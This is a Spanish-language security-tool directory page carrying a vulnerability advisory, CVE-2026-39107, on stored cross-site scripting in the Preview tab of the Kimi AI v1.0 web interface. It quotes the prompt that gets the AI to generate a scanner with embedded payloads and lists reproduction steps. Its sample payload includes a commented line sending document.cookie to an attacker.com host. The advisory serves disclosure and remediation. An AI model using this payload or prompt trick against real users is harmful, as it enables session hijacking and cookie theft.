Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-39107 — Divulgación detallada de una vulnerabilidad XSS almacenada en la pestaña Vista previa de Kimi AI v1.0, incluyendo el escenario de ataque, el PoC y las pautas de remediación para investigadores de seguridad. | Kitploit
Herramientas/GitHubGitHub/mgtx2/cve-2026-39107
Análisis de VulnerabilidadesExplotación de Aplicaciones WebSeguridad WebPapers e InvestigaciónAprendizaje y Educación
GitHubmgtx2/cve-2026-39107

CVE-2026-39107

Divulgación detallada de una vulnerabilidad XSS almacenada en la pestaña Vista previa de Kimi AI v1.0, incluyendo el escenario de ataque, el PoC y las pautas de remediación para investigadores de seguridad.

Ver Repositorio
hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-39107: Cross-Site Scripting (XSS) en Kimi AI v1.0

Descripción

Existe una vulnerabilidad de Cross-Site Scripting (XSS) en la función 'Preview' de la interfaz web de Kimi AI v1.0. La aplicación no sanea ni codifica adecuadamente las cargas útiles HTML/JavaScript generadas por el modelo de IA. Cuando un usuario cambia a la pestaña 'Preview' para ver el código generado por la IA, la carga útil maliciosa se renderiza directamente en el DOM, lo que provoca la ejecución arbitraria de JavaScript en la sesión del navegador de la víctima.

Investigador

Mustafa Hameed

Detalles de la vulnerabilidad

  • Tipo de vulnerabilidad: Cross-Site Scripting (XSS) almacenado/tipo almacenado a través de la respuesta de la IA
  • Producto afectado: Kimi AI
  • Versión afectada: v1.0
  • Componente afectado: Pestaña 'Preview' / Componente de renderizado de código

Escenario de ataque y explotación

La vulnerabilidad puede explotarse pidiendo a la IA que genere una herramienta o script de seguridad (por ejemplo, un escáner XSS automatizado similar a XSStrike) que contenga cargas útiles integradas. La IA genera el código fuente de la aplicación solicitada, pero incrusta la carga útil maliciosa dentro del framework HTML/JavaScript. Cuando la víctima navega a la pestaña 'Preview' para probar o ver la herramienta generada, la carga útil maliciosa incrustada evita el saneamiento y se ejecuta inmediatamente.

Prompt utilizado:

"Crea una herramienta web simple de escaneo XSS similar a XSStrike. Incluye una interfaz con una lista de cargas útiles para escanear."

Ejemplo de carga útil maliciosa incrustada:

root@kitploit:~
<script>
    alert('mustafa');
// Potential for malicious action: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>

Pasos para reproducir

1.Inicie sesión en la plataforma web de Kimi AI.

2.Proporcione el prompt solicitando la creación de una herramienta (como el clon de XSStrike) que contenga el código del escáner.

3.Espere a que el modelo de IA genere completamente la respuesta de código.

4.Haga clic en la pestaña 'Preview' en la interfaz de chat para ver la aplicación renderizada.

5.La aplicación no filtra el contexto JavaScript dentro del contenedor de vista previa, lo que provoca la ejecución inmediata del script en el navegador de la víctima.

Prueba de concepto (PoC)

A continuación se muestra la captura de pantalla que demuestra la ejecución exitosa de la carga útil XSS. El JavaScript malicioso se activa inmediatamente al navegar a la pestaña 'Preview':

XSS
Descargar herramienta